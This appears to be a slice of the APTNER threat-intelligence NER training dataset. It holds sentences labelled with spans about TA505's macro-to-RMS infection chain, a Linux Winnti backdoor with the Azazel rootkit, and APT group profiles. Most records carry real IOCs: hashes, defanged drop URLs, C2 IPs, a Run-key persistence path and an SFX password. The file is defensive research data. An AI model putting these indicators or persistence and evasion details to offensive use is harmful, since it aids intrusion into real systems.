"ScarCruft tools : 
032ed0cd234f73865d55103bf4ceaa22 Downloader .", "spans": {"Organization: ScarCruft": [[0, 9]], "Indicator: 032ed0cd234f73865d55103bf4ceaa22": [[18, 50]], "System: Downloader": [[51, 61]]}, "info": {"id": "aptner_train_002513", "source": "aptner_train"}} {"text": "ScarCruft tools : 22aaf617a86e026424edb7c868742495 AV Remover .", "spans": {"Organization: ScarCruft": [[0, 9]], "Indicator: 22aaf617a86e026424edb7c868742495": [[18, 50]], "System: AV Remover": [[51, 61]]}, "info": {"id": "aptner_train_002514", "source": "aptner_train"}} {"text": "ScarCruft tools : 07d2200f5c2d03845adb5b20841faa94 AV Remover .", "spans": {"Organization: ScarCruft": [[0, 9]], "Indicator: 07d2200f5c2d03845adb5b20841faa94": [[18, 50]], "System: AV Remover": [[51, 61]]}, "info": {"id": "aptner_train_002515", "source": "aptner_train"}} {"text": "GreezaBackdoor of DarkHotel : 5e0e11bca0e94914e565c1dcc1ee6860 .", "spans": {"Malware: GreezaBackdoor": [[0, 14]], "Organization: DarkHotel": [[18, 27]], "Indicator: 5e0e11bca0e94914e565c1dcc1ee6860": [[30, 62]]}, "info": {"id": "aptner_train_002516", "source": "aptner_train"}} {"text": "TA505 is Expanding its Operations In the last few days , during monitoring activities , Yoroi CERT noticed a suspicious attack against an Italian organization .", "spans": {"Organization: TA505": [[0, 5]], "Organization: Yoroi CERT": [[88, 98]]}, "info": {"id": "aptner_train_002517", "source": "aptner_train"}} {"text": "The threat group is also known for its recent attack campaign against Bank and Retail business sectors , but the latest evidence indicates a potential expansion of its criminal operation to other industries too .", "spans": {}, "info": {"id": "aptner_train_002519", "source": "aptner_train"}} {"text": "Dropper : 0c88e285b6fc183c96b6f03ca5700cc9ca7c83dfccc6ad14a946d1868d1cc273 Excel file with malicious macro .", "spans": {"Malware: Dropper": [[0, 7]], "Indicator: 0c88e285b6fc183c96b6f03ca5700cc9ca7c83dfccc6ad14a946d1868d1cc273": [[10, 74]], "System: 
Excel": [[75, 80]], "System: malicious macro": [[91, 106]]}, "info": {"id": "aptner_train_002520", "source": "aptner_train"}} {"text": "The intercepted attack starts with a spear phishing email embedding a spreadsheet .", "spans": {}, "info": {"id": "aptner_train_002521", "source": "aptner_train"}} {"text": "The document is weaponized with malicious macro code triggered when the user opens the document to see the content under the obfuscated view .", "spans": {"System: malicious macro": [[32, 47]]}, "info": {"id": "aptner_train_002522", "source": "aptner_train"}} {"text": "To understand its capabilities , the macro code has been isolated and analyzed in detail .", "spans": {"System: macro": [[37, 42]]}, "info": {"id": "aptner_train_002523", "source": "aptner_train"}} {"text": "Surprisingly , the source code is composed by more than 1600 lines of code and it is highly obfuscated .", "spans": {}, "info": {"id": "aptner_train_002524", "source": "aptner_train"}} {"text": "Paying more attention during the code analysis , we discovered that it is full of junk instructions used to declare and initialize variables never used .", "spans": {}, "info": {"id": "aptner_train_002525", "source": "aptner_train"}} {"text": "Only a small portion of this code is actually used to start the infection , the rest is just junk code .", "spans": {}, "info": {"id": "aptner_train_002526", "source": "aptner_train"}} {"text": "Once the macro is executed , the malware downloads two files from “ kentona[.su ” , using an SSL encrypted communication , and stores them in “ C:\\Users\\Public ” path : “ rtegre.exe ” and “ wprgxyeqd79.exe ” .", "spans": {"System: macro": [[9, 14]], "Indicator: kentona[.su": [[68, 79]], "Indicator: rtegre.exe": [[171, 181]], "Indicator: wprgxyeqd79.exe": [[190, 205]]}, "info": {"id": "aptner_train_002527", "source": "aptner_train"}} {"text": "Generic : aafa83d5e0619e69e64fcac4626cfb298baac54c7251f479721df1c2eb16bee7 Trojan ( Executable file ) .", "spans": {"Malware: 
Generic": [[0, 7]], "Indicator: aafa83d5e0619e69e64fcac4626cfb298baac54c7251f479721df1c2eb16bee7": [[10, 74]], "Malware: Trojan": [[75, 81]]}, "info": {"id": "aptner_train_002528", "source": "aptner_train"}} {"text": "Trojan : 6f1a8ee627ec2ed7e1d818d32a34a163416938eb13a97783a71f9b79843a80a2 SFX ( self-extracting archive ) ( Executable file ) .", "spans": {"Malware: Trojan": [[0, 6]], "Indicator: 6f1a8ee627ec2ed7e1d818d32a34a163416938eb13a97783a71f9b79843a80a2": [[9, 73]], "System: SFX": [[74, 77]], "System: self-extracting archive": [[80, 103]]}, "info": {"id": "aptner_train_002529", "source": "aptner_train"}} {"text": "The “ wprgxyeqd79.exe ” sample actually is a Self Extracting Archive ( SFX ) containing four files designed to be extracted in the %TEMP% folder .", "spans": {"Indicator: wprgxyeqd79.exe": [[6, 21]], "System: Self Extracting Archive": [[45, 68]], "System: SFX": [[71, 74]]}, "info": {"id": "aptner_train_002530", "source": "aptner_train"}} {"text": "After that , it executes “ exit.exe ” which launches the “ i.cmd ” batch script .", "spans": {"Indicator: exit.exe": [[27, 35]], "Indicator: i.cmd": [[59, 64]]}, "info": {"id": "aptner_train_002531", "source": "aptner_train"}} {"text": "This new script performs a ping to “ www[.cloudflare[.com ” for three times with a delay of 3000ms , testing the connectivity of the victim machine .", "spans": {"Indicator: www[.cloudflare[.com": [[37, 57]]}, "info": {"id": "aptner_train_002532", "source": "aptner_train"}} {"text": "If the host is successfully reached , the script renames a file named “ kernel.dll ” , obviously not the real one , in “ uninstall.exe ” , another misleading name .", "spans": {"Indicator: kernel.dll": [[72, 82]], "Indicator: uninstall.exe": [[121, 134]]}, "info": {"id": "aptner_train_002533", "source": "aptner_train"}} {"text": "Then it invokes the renamed executable and runs it passing a series of parameter : “ uninstall.exe x -pQELRatcwbU2EJ5 -y ”", "spans": {"Indicator: uninstall.exe": 
[[85, 98]]}, "info": {"id": "aptner_train_002534", "source": "aptner_train"}} {"text": "These parameters are needed to self-decrypt the “ uninstall.exe ” file which is again another SFX archive .", "spans": {"Indicator: uninstall.exe": [[50, 63]], "System: SFX": [[94, 97]]}, "info": {"id": "aptner_train_002535", "source": "aptner_train"}} {"text": "The “ -p ” parameter , indeed , specify the password of the archive to be extracted .", "spans": {}, "info": {"id": "aptner_train_002536", "source": "aptner_train"}} {"text": "The crucial file , at this point of the infection , is the SFX executable named “ uninstall.exe ” .", "spans": {"System: SFX": [[59, 62]], "Indicator: uninstall.exe": [[82, 95]]}, "info": {"id": "aptner_train_002537", "source": "aptner_train"}} {"text": "It has a structure similar to previous “ wprgxyeqd79.exe ” file : two of their files have the same name , but the content of this new SFX is extracted in the “ %ALLUSERSPROFILE%\\Windows Anytime Upgrade ” directory .", "spans": {"Indicator: wprgxyeqd79.exe": [[41, 56]], "System: SFX": [[134, 137]], "System: %ALLUSERSPROFILE%\\Windows": [[160, 185]]}, "info": {"id": "aptner_train_002538", "source": "aptner_train"}} {"text": "Another time , the execution flow moves from “ exit.exe to “ i.cmd ” .", "spans": {"Indicator: exit.exe": [[47, 55]], "Indicator: i.cmd": [[61, 66]]}, "info": {"id": "aptner_train_002539", "source": "aptner_train"}} {"text": "The script is quite different from the previous one : it guarantees its persistence on the victim machine through the setting of “ HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run ” registry key , creating a new entry named “ Windows Anytime Upgrade ” which points to “ winserv.exe ” , just stored into the same folder .", "spans": {"System: Windows": [[228, 235]], "Indicator: winserv.exe": [[272, 283]]}, "info": {"id": "aptner_train_002540", "source": "aptner_train"}} {"text": "Thus , the script provides to run “ winserv.exe ” .", "spans": 
{"Indicator: winserv.exe": [[36, 47]]}, "info": {"id": "aptner_train_002541", "source": "aptner_train"}} {"text": "An interesting part of the script is the continuous killing of every “ rundll32.exe ” process running into the victim machine , generates a huge amount of noise , as visible in the following process explorer view .", "spans": {"Indicator: rundll32.exe": [[71, 83]]}, "info": {"id": "aptner_train_002542", "source": "aptner_train"}} {"text": "Anyway , just before the kill loop , the real malicious payload is executed : the", "spans": {}, "info": {"id": "aptner_train_002543", "source": "aptner_train"}} {"text": "“ winserv.exe ” file .", "spans": {"Indicator: winserv.exe": [[2, 13]]}, "info": {"id": "aptner_train_002544", "source": "aptner_train"}} {"text": "Analyzing it in depth , we discover it actually is the RMS ( Remote Manipulator System ) client by TektonIT , encrypted using the MPress PE compressor utility , a legitimate tool , to avoid antivirus detection .", "spans": {"System: RMS": [[55, 58]], "System: Remote Manipulator System": [[61, 86]], "System: TektonIT": [[99, 107]], "System: MPress PE": [[130, 139]]}, "info": {"id": "aptner_train_002545", "source": "aptner_train"}} {"text": "TektonIT RMS acts as a remote administration tool , allowing the attacker to gain complete access to the victim machine .", "spans": {"System: TektonIT": [[0, 8]], "System: RMS": [[9, 12]]}, "info": {"id": "aptner_train_002546", "source": "aptner_train"}} {"text": "Together with the RMS executable , there is another file named “ settings.dat ” containing the custom configuration prepared by the attacker .", "spans": {"System: RMS": [[18, 21]], "Indicator: settings.dat": [[65, 77]]}, "info": {"id": "aptner_train_002547", "source": "aptner_train"}} {"text": "It contains information like : Server address and port the client will connect to ; The password chosen by the attacker for the remote access ; The ID associated to the victim client .", "spans": {}, "info": {"id": 
"aptner_train_002548", "source": "aptner_train"}} {"text": "All these information are automatically loaded by the RMS executable and firstly stored in the registry key “ HKCU\\Software\\tektonik\\Remote MANIPULATOR System\\Host\\parameters ” .", "spans": {"System: RMS": [[54, 57]]}, "info": {"id": "aptner_train_002549", "source": "aptner_train"}} {"text": "At the next startup , the software will directly load the configuration from the just created key .", "spans": {}, "info": {"id": "aptner_train_002550", "source": "aptner_train"}} {"text": "The client establishes a new connection with the remote command and control server hosted on a Bulgarian remote host 217.12.201.159 , part of a Virtual Dedicated Server subnet of the AS-21100, operated by ITL LLC .", "spans": {"Indicator: 217.12.201.159": [[117, 131]], "System: Virtual Dedicated Server": [[144, 168]], "System: ITL": [[205, 208]], "System: LLC": [[209, 212]]}, "info": {"id": "aptner_train_002551", "source": "aptner_train"}} {"text": "After the reconstruction of the full infection chain , we noticed strong similarities with a recent spear-phishing attack campaign against an unspecified US retail company .", "spans": {}, "info": {"id": "aptner_train_002552", "source": "aptner_train"}} {"text": "The comparison of the infection chains reveals in both cases the attacker used a couple of SFX stages to deploy the “ RMS ” software : a legitimate remote administration tool produced by the Russian company “ TektonIT ” .", "spans": {"System: SFX": [[91, 94]], "System: RMS": [[118, 121]], "System: TektonIT": [[209, 217]]}, "info": {"id": "aptner_train_002554", "source": "aptner_train"}} {"text": "The tool is able to grant remote access and full , direct control of the infected machine to the group .", "spans": {}, "info": {"id": "aptner_train_002555", "source": "aptner_train"}} {"text": "Also , some code pieces are directly re-used in the", "spans": {}, "info": {"id": "aptner_train_002556", "source": "aptner_train"}} 
{"text": "analyzed campaigns , such as the “ i.cmd ” and “ exit.exe ” files , and , at the same time , some new components have been introduced , for instance the “ rtegre.exe ” and the “ veter1605_MAPS_10cr0.exe ” file .", "spans": {"Indicator: i.cmd": [[35, 40]], "Indicator: exit.exe": [[49, 57]], "Indicator: rtegre.exe": [[155, 165]], "Indicator: veter1605_MAPS_10cr0.exe": [[178, 202]]}, "info": {"id": "aptner_train_002557", "source": "aptner_train"}} {"text": "During the analysis , we also noticed the “ veter1605_MAPS_10cr0.exe ” file slightly changed run after run , a few hours after the initial discovery the infection chain dropped it with different icons , different suffix , from “ cr0 ” to “ cr24 ” , and appendix from “ veter1605_ ” to “ veter2005_ ” .", "spans": {"Indicator: veter1605_MAPS_10cr0.exe": [[44, 68]]}, "info": {"id": "aptner_train_002558", "source": "aptner_train"}} {"text": "This may indicate the campaign is still ongoing .", "spans": {}, "info": {"id": "aptner_train_002559", "source": "aptner_train"}} {"text": "The peculiarity of this recent attack wave is it actually hit a company not strictly in the Banking or Retail sector , as they recently did , suggesting the threat group could be potentially widening their current operations .", "spans": {}, "info": {"id": "aptner_train_002561", "source": "aptner_train"}} {"text": "Dropurl : kentona[.su – 47.245.58.124 https://kentona[.su/xpepriubgpokejifuv7efrhguskdgfjn/ananas.exe https://kentona[.su/xpepriubgpokejifuv7efrhguskdgfjn/pasmmm.exe C2: 217[.12.201.159 TA505 : 0c88e285b6fc183c96b6f03ca5700cc9ca7c83dfccc6ad14a946d1868d1cc27325 TA505 : 1ee1ba514212f11a69d002005dfc623b1871cc808f18ddfa2191102bbb9f623b TA505 : fd701894e7ec8d8319bc9b32bba5892b11bdf608c3d04c2f18eff83419eb6df0 TA505 : c69ce39ac3e178a89076136af7418c6cb664844b0ce5cb643912ed56c373a08a TA505 : 5310c2397ba4c783f7ee9724711a6da9b5c603b5c9781fff3407b46725e338b3 .", "spans": {"Indicator: kentona[.su": [[10, 21]], "Indicator: 47.245.58.124": 
[[24, 37]], "Indicator: https://kentona[.su/xpepriubgpokejifuv7efrhguskdgfjn/ananas.exe": [[38, 101]], "Indicator: https://kentona[.su/xpepriubgpokejifuv7efrhguskdgfjn/pasmmm.exe": [[102, 165]], "Indicator: 217[.12.201.159": [[170, 185]], "Organization: TA505": [[186, 191], [261, 266], [334, 339], [407, 412], [480, 485]], "Indicator: 0c88e285b6fc183c96b6f03ca5700cc9ca7c83dfccc6ad14a946d1868d1cc27325": [[194, 260]], "Indicator: 1ee1ba514212f11a69d002005dfc623b1871cc808f18ddfa2191102bbb9f623b": [[269, 333]], "Indicator: fd701894e7ec8d8319bc9b32bba5892b11bdf608c3d04c2f18eff83419eb6df0": [[342, 406]], "Indicator: c69ce39ac3e178a89076136af7418c6cb664844b0ce5cb643912ed56c373a08a": [[415, 479]], "Indicator: 5310c2397ba4c783f7ee9724711a6da9b5c603b5c9781fff3407b46725e338b3": [[488, 552]]}, "info": {"id": "aptner_train_002562", "source": "aptner_train"}} {"text": "Winnti : More than just Windows and Gates .", "spans": {"Organization: Winnti": [[0, 6]], "System: Windows": [[24, 31]]}, "info": {"id": "aptner_train_002563", "source": "aptner_train"}} {"text": "The Winnti malware family was first reported in 2013 by Kaspersky Lab .", "spans": {"Organization: Winnti": [[4, 10]], "Organization: Kaspersky Lab": [[56, 69]]}, "info": {"id": "aptner_train_002564", "source": "aptner_train"}} {"text": "Since then , threat actors leveraging Winnti malware have victimized a diverse set of targets forvaried motivations .", "spans": {"Organization: Winnti": [[38, 44]]}, "info": {"id": "aptner_train_002565", "source": "aptner_train"}} {"text": "While the name ‘ Winnti ’ in public reporting was previously used tosignify a single actor , pronounced divergence in targeting and tradecraft betweencampaigns has led industry consensus to break up the tracking of the continued use ofthe Winnti malware under different actor clusters .", "spans": {"Organization: Winnti": [[17, 23], [239, 245]]}, "info": {"id": "aptner_train_002566", "source": "aptner_train"}} {"text": "The underlying hypothesis is 
that themalware itself may be shared ( or sold ) across a small group of actors .", "spans": {}, "info": {"id": "aptner_train_002567", "source": "aptner_train"}} {"text": "In April 2019 , reports emerged of an intrusion involving Winnti malware at a GermanPharmaceutical company .", "spans": {"Organization: Winnti": [[58, 64]], "Organization: GermanPharmaceutical": [[78, 98]]}, "info": {"id": "aptner_train_002568", "source": "aptner_train"}} {"text": "Following these reports , Chronicle researchers doubled downon efforts to try to unravel the various campaigns where Winnti was leveraged .", "spans": {"Organization: Chronicle": [[26, 35]], "Organization: Winnti": [[117, 123]]}, "info": {"id": "aptner_train_002569", "source": "aptner_train"}} {"text": "Analysisof these larger convoluted clusters is ongoing .", "spans": {}, "info": {"id": "aptner_train_002570", "source": "aptner_train"}} {"text": "While reviewing a 2015 report of a Winnti intrusion at a Vietnamese gaming company , we identified a small cluster of Winnti samples designed specifically for Linux .", "spans": {"Organization: Winnti": [[35, 41], [118, 124]], "Organization: Vietnamese": [[57, 67]], "System: Linux": [[159, 164]]}, "info": {"id": "aptner_train_002571", "source": "aptner_train"}} {"text": "The following is a technical analysis of thisvariant .", "spans": {}, "info": {"id": "aptner_train_002572", "source": "aptner_train"}} {"text": "The Linux version of Winnti is comprised of two files : a main backdoor ( libxselinux ) and a library ( libxselinux.so ) used to hide it ’s activity on an infected system . ‘ libxselinux.so ’ — the userland rootkit . 
libxselinux.so.old : 11a9f798227be8a53b06d7e8943f8d68 906dc86cb466c1a22cf847dda27a434d04adf065 4741c2884d1ca3a40dadd3f3f61cb95a59b11f99a0f980dbadc663b85eb77a2a IP .", "spans": {"System: Linux": [[4, 9]], "Organization: Winnti": [[21, 27]], "Malware: libxselinux": [[74, 85]], "Indicator: libxselinux.so": [[104, 118], [175, 189]], "Indicator: libxselinux.so.old": [[217, 235]], "Indicator: 11a9f798227be8a53b06d7e8943f8d68": [[238, 270]], "Indicator: 906dc86cb466c1a22cf847dda27a434d04adf065": [[271, 311]], "Indicator: 4741c2884d1ca3a40dadd3f3f61cb95a59b11f99a0f980dbadc663b85eb77a2a": [[312, 376]]}, "info": {"id": "aptner_train_002573", "source": "aptner_train"}} {"text": "Ids.me .", "spans": {"Indicator: Ids.me": [[0, 6]]}, "info": {"id": "aptner_train_002574", "source": "aptner_train"}} {"text": "The library used to hide Winnti ’s system activity is a copy of the open-source userland rootkit Azazel , with minor changes .", "spans": {"Organization: Winnti": [[25, 31]], "System: Azazel": [[97, 103]]}, "info": {"id": "aptner_train_002575", "source": "aptner_train"}} {"text": "When executed , it will register symbols for multiple commonly used functions , including : open() , rmdir() , and unlink() , and modify their returns to hide the malware ’s operations .", "spans": {"System: open()": [[92, 98]], "System: rmdir()": [[101, 108]], "System: unlink()": [[115, 123]]}, "info": {"id": "aptner_train_002576", "source": "aptner_train"}} {"text": "Unlike standard Azazel which is configured to hide network activity based on port ranges , the Winnti modified version keeps a list of process identifiers and network connections associated with the malware ’s activity .", "spans": {"System: Azazel": [[16, 22]], "Organization: Winnti": [[95, 101]]}, "info": {"id": "aptner_train_002578", "source": "aptner_train"}} {"text": "This modification likely serves to simplify the operator ’s sample configuration process by not having to denote specific ports to hide .", "spans": {}, "info": 
{"id": "aptner_train_002579", "source": "aptner_train"}} {"text": "Strings within this sample associated with the malware ’s operations are encoded using a single-byte XOR encoding .", "spans": {}, "info": {"id": "aptner_train_002580", "source": "aptner_train"}} {"text": "The following is an example Python function to decode these strings . libxselinux.old : 7f4764c6e6dabd262341fd23a9b105a3 dc96d0f02151e702ef764bbc234d1e73d2811416 ae9d6848f33644795a0cc3928a76ea194b99da3c10f802db22034d9f695a0c23 IP .", "spans": {"System: Python": [[28, 34]], "Indicator: libxselinux.old": [[70, 85]], "Indicator: 7f4764c6e6dabd262341fd23a9b105a3": [[88, 120]], "Indicator: dc96d0f02151e702ef764bbc234d1e73d2811416": [[121, 161]], "Indicator: ae9d6848f33644795a0cc3928a76ea194b99da3c10f802db22034d9f695a0c23": [[162, 226]]}, "info": {"id": "aptner_train_002581", "source": "aptner_train"}} {"text": "Ids.me .", "spans": {"Indicator: Ids.me": [[0, 6]]}, "info": {"id": "aptner_train_002582", "source": "aptner_train"}} {"text": "Winnti Linux variant ’s core functionality is within ‘ libxselinux ’ .", "spans": {"Organization: Winnti": [[0, 6]], "System: Linux": [[7, 12]], "Malware: libxselinux": [[55, 66]]}, "info": {"id": "aptner_train_002583", "source": "aptner_train"}} {"text": "Upon execution , an embedded configuration is decoded from the data section using a simple XOR cipher .", "spans": {}, "info": {"id": "aptner_train_002584", "source": "aptner_train"}} {"text": "The decoded configuration is similar in structure to the version Kaspersky classifies as Winnti 2.0, as well as samples in the 2015 Novetta report .", "spans": {"Organization: Winnti": [[89, 95]], "Organization: Novetta": [[132, 139]]}, "info": {"id": "aptner_train_002585", "source": "aptner_train"}} {"text": "Embedded in this sample ’s configuration three command-and-control server addresses and two additional strings we believe to be campaign designators .", "spans": {}, "info": {"id": "aptner_train_002586", "source": 
"aptner_train"}} {"text": "Winnti ver.1 , these values were designated as ‘ tag ’ and ‘ group ’ .", "spans": {"Organization: Winnti": [[0, 6]]}, "info": {"id": "aptner_train_002587", "source": "aptner_train"}} {"text": "For context , embedded Winnti campaign designators have ranged from target names , geographic areas , industry , and profanity .", "spans": {"Organization: Winnti": [[23, 29]]}, "info": {"id": "aptner_train_002588", "source": "aptner_train"}} {"text": "Winnti malware handles outbound communications using multiple protocols including : ICMP , HTTP , as well as custom TCP and UDP protocols .", "spans": {"Organization: Winnti": [[0, 6]]}, "info": {"id": "aptner_train_002589", "source": "aptner_train"}} {"text": "Use of these protocols is thoroughly documented in the Novetta and Kaspersky reports .", "spans": {"Organization: Novetta": [[55, 62]], "Organization: Kaspersky": [[67, 76]]}, "info": {"id": "aptner_train_002590", "source": "aptner_train"}} {"text": "While the outbound communication mechanisms are well documented , less attention has been paid to a feature of recent versions of Winnti we came across in the Linux variant ( as well as Windows ) that allows the operators to initiate a connection directly to an infected host , without requiring a connection to a control server .", "spans": {"Organization: Winnti": [[130, 136]], "System: Linux": [[159, 164]], "System: Windows": [[186, 193]]}, "info": {"id": "aptner_train_002591", "source": "aptner_train"}} {"text": "This secondary communication channel may be used by operators when access to the hard-coded control servers is disrupted .", "spans": {}, "info": {"id": "aptner_train_002592", "source": "aptner_train"}} {"text": "Additionally , the operators could leverage this feature when infecting internet-facing devices in a targeted organization to allow them to reenter a network if evicted from internal hosts .", "spans": {}, "info": {"id": "aptner_train_002593", "source": "aptner_train"}} {"text": 
"This passive implant approach to network persistence has been previously observed with threat actors like Project Sauron and the Lamberts .", "spans": {"System: Project Sauron": [[106, 120]], "System: Lamberts": [[129, 137]]}, "info": {"id": "aptner_train_002594", "source": "aptner_train"}} {"text": "Initial technical information about this feature was shared by the Thyssenkrupp CERT in the form of an Nmap script that could be used to identify Winnti infections through network scanning .", "spans": {"Organization: Thyssenkrupp CERT": [[67, 84]], "System: Nmap": [[103, 107]], "Organization: Winnti": [[146, 152]]}, "info": {"id": "aptner_train_002595", "source": "aptner_train"}} {"text": "This script identifies infected hosts by first sending a custom hello packet , immediately followed by an encoded request for host information , and then parsing the response .", "spans": {}, "info": {"id": "aptner_train_002596", "source": "aptner_train"}} {"text": "The initial request , referred to as the helo/hello request in the Nmap script , is comprised of four DWORDs .", "spans": {"System: Nmap": [[67, 71]], "System: DWORDs": [[102, 108]]}, "info": {"id": "aptner_train_002597", "source": "aptner_train"}} {"text": "The first three are generated by rand() and the fourth is computed based on the first and third .", "spans": {"System: rand()": [[33, 39]]}, "info": {"id": "aptner_train_002598", "source": "aptner_train"}} {"text": "When received by a Winnti infected host , it will validate the received packet and listen for a second inbound request containing tasking .", "spans": {"Organization: Winnti": [[19, 25]]}, "info": {"id": "aptner_train_002599", "source": "aptner_train"}} {"text": "This second request ( Encoded Get System Information Request ) is encoded using the same method as the custom TCP protocol used for communication with command-and-control servers , which uses a four-byte XOR encoding .", "spans": {}, "info": {"id": "aptner_train_002600", "source": 
"aptner_train"}} {"text": "Before acting on the request , Winnti will validate the third DWORD contains the magic value 0xABC18CBA before executing tasking .", "spans": {"Organization: Winnti": [[31, 37]], "System: DWORD": [[62, 67]]}, "info": {"id": "aptner_train_002601", "source": "aptner_train"}} {"text": "Clusters of Winnti related activity have become a complex topic in threat intelligence circles , with activity vaguely attributed to different codenamed threat actors .", "spans": {"Organization: Winnti": [[12, 18]]}, "info": {"id": "aptner_train_002602", "source": "aptner_train"}} {"text": "The threat actors utilizing this toolset have repeatedly demonstrated their expertise in compromising Windows based environments .", "spans": {"System: Windows": [[102, 109]]}, "info": {"id": "aptner_train_002603", "source": "aptner_train"}} {"text": "An expansion into Linux tooling indicates iteration outside of their traditional comfort zone .", "spans": {"System: Linux": [[18, 23]]}, "info": {"id": "aptner_train_002604", "source": "aptner_train"}} {"text": "This may indicate the OS requirements of their intended targets but it may also be an attempt to take advantage of a security telemitry blindspot in many enterprises , as is with Penquin Turla and APT28 ’s Linux XAgent variant .", "spans": {"System: OS": [[22, 24]], "Malware: Penquin Turla": [[179, 192]], "Organization: APT28": [[197, 202]], "System: Linux": [[206, 211]], "System: XAgent": [[212, 218]]}, "info": {"id": "aptner_train_002605", "source": "aptner_train"}} {"text": "Utilizing a passive listener as a communications channel is characteristic of the Winnti developers ’ foresight in needing a failsafe secondary command-and-control mechanisms .", "spans": {"Organization: Winnti": [[82, 88]]}, "info": {"id": "aptner_train_002606", "source": "aptner_train"}} {"text": "The group has shown interest in prominent figures in the United Nations , as well as opposition bloggers , activists , regional news 
correspondents , and think tanks .", "spans": {"System: think tanks": [[154, 165]]}, "info": {"id": "aptner_train_002608", "source": "aptner_train"}} {"text": "A group known by Microsoft as O NEODYMIUM is Oreportedly associated closely with O BlackOasis operations , but evidence that the group names are aliases has not been identified .", "spans": {"Organization: Microsoft": [[17, 26]], "Organization: NEODYMIUM": [[32, 41]], "Organization: BlackOasis": [[83, 93]]}, "info": {"id": "aptner_train_002609", "source": "aptner_train"}} {"text": "BRONZE BUTLER : REDBALDKNIGHT , Tick .", "spans": {"Organization: BRONZE BUTLER": [[0, 13]], "Organization: REDBALDKNIGHT": [[16, 29]], "Organization: Tick": [[32, 36]]}, "info": {"id": "aptner_train_002610", "source": "aptner_train"}} {"text": "BRONZE BUTLER is a cyber espionage group with likely Chinese origins that has been active since at least 2008 .", "spans": {"Organization: BRONZE BUTLER": [[0, 13]]}, "info": {"id": "aptner_train_002611", "source": "aptner_train"}} {"text": "The group primarily targets Japanese organizations , particularly those in government , biotechnology , electronics manufacturing , and industrial chemistry .", "spans": {"Organization: government": [[75, 85]]}, "info": {"id": "aptner_train_002612", "source": "aptner_train"}} {"text": "Carbanak : Anunak , Carbon Spider .", "spans": {"Organization: Carbanak": [[0, 8]], "Organization: Anunak": [[11, 17]], "Organization: Carbon Spider": [[20, 33]]}, "info": {"id": "aptner_train_002613", "source": "aptner_train"}} {"text": "Carbanak is a threat group that mainly targets banks .", "spans": {"Organization: Carbanak": [[0, 8]]}, "info": {"id": "aptner_train_002614", "source": "aptner_train"}} {"text": "It also refers to malware of the same name ( Carbanak ) .", "spans": {"Malware: Carbanak": [[45, 53]]}, "info": {"id": "aptner_train_002615", "source": "aptner_train"}} {"text": "It is sometimes referred to as O FIN7 , but these appear to be two groups using 
the same O Carbanak  malware and are therefore tracked separately .", "spans": {"Organization: FIN7": [[33, 37]], "Malware: Carbanak ": [[91, 100]]}, "info": {"id": "aptner_train_002616", "source": "aptner_train"}} {"text": "Gamaredon Group is a threat group that has been active since at least 2013 and has targeted individuals likely involved in the Ukrainian government .", "spans": {"Organization: Gamaredon": [[0, 9]], "Organization: Ukrainian government": [[127, 147]]}, "info": {"id": "aptner_train_002617", "source": "aptner_train"}} {"text": "GCMAN is a threat group that focuses on targeting banks for the purpose of transferring money to e-currency sevises .", "spans": {"Organization: GCMAN": [[0, 5]]}, "info": {"id": "aptner_train_002618", "source": "aptner_train"}} {"text": "Gorgon Group is a threat group consisting of members who are suspected to be Pakistan based or have other connections to Pakistan .", "spans": {"Organization: Gorgon Group": [[0, 12]]}, "info": {"id": "aptner_train_002619", "source": "aptner_train"}} {"text": "The group has performed a mix of criminal and targeted attacks , including campaigns against government organizations in the United Kingdom , Spain , Russia , and the United States .", "spans": {}, "info": {"id": "aptner_train_002620", "source": "aptner_train"}} {"text": "Sandworm Team : Quedagh , VOODOO BEAR .", "spans": {"Organization: Sandworm Team": [[0, 13]], "Organization: Quedagh": [[16, 23]], "Organization: VOODOO BEAR": [[26, 37]]}, "info": {"id": "aptner_train_002621", "source": "aptner_train"}} {"text": "Sandworm Team is a Russian cyber espionage group that has operated since approximately 2009 .", "spans": {"Organization: Sandworm Team": [[0, 13]]}, "info": {"id": "aptner_train_002622", "source": "aptner_train"}} {"text": "The group likely consists of Russian pro-hacktivists .", "spans": {}, "info": {"id": "aptner_train_002623", "source": "aptner_train"}} {"text": "Sandworm Team targets mainly Ukrainian entities 
associated with energy , industrial control systems , SCADA , government , and media .", "spans": {"Organization: Sandworm Team": [[0, 13]]}, "info": {"id": "aptner_train_002624", "source": "aptner_train"}} {"text": "Sandworm Team has been linked to the Ukrainian energy sector attack in late 2015 .", "spans": {"Organization: Sandworm Team": [[0, 13]]}, "info": {"id": "aptner_train_002625", "source": "aptner_train"}} {"text": "Scarlet Mimic is a threat group that has targeted minority rights activists .", "spans": {"Organization: Scarlet Mimic": [[0, 13]]}, "info": {"id": "aptner_train_002626", "source": "aptner_train"}} {"text": "This group has not been directly linked to a government source , but the group 's motivations appear to overlap with those of the Chinese government .", "spans": {"Organization: Chinese government": [[130, 148]]}, "info": {"id": "aptner_train_002627", "source": "aptner_train"}} {"text": "While there is some overlap between IP addresses used by Scarlet Mimic Panda , it has not been concluded that the groups are the same .", "spans": {"Organization: by Scarlet Mimic": [[54, 70]]}, "info": {"id": "aptner_train_002628", "source": "aptner_train"}} {"text": "Silence is a financially motivated threat actor targeting financial institutions in different countries .", "spans": {"Organization: Silence": [[0, 7]]}, "info": {"id": "aptner_train_002629", "source": "aptner_train"}} {"text": "The group was first seen in June 2016 .", "spans": {}, "info": {"id": "aptner_train_002630", "source": "aptner_train"}} {"text": "Their main targets reside in Russia , Ukraine , Belarus , Azerbaijan , Poland and Kazakhstan .", "spans": {}, "info": {"id": "aptner_train_002631", "source": "aptner_train"}} {"text": "They compromised various banking systems , including the Russian Central Bank 's Automated Workstation Client , ATMs , and card processing .", "spans": {}, "info": {"id": "aptner_train_002632", "source": "aptner_train"}} {"text": "Threat Group-1314 : TG-1314 
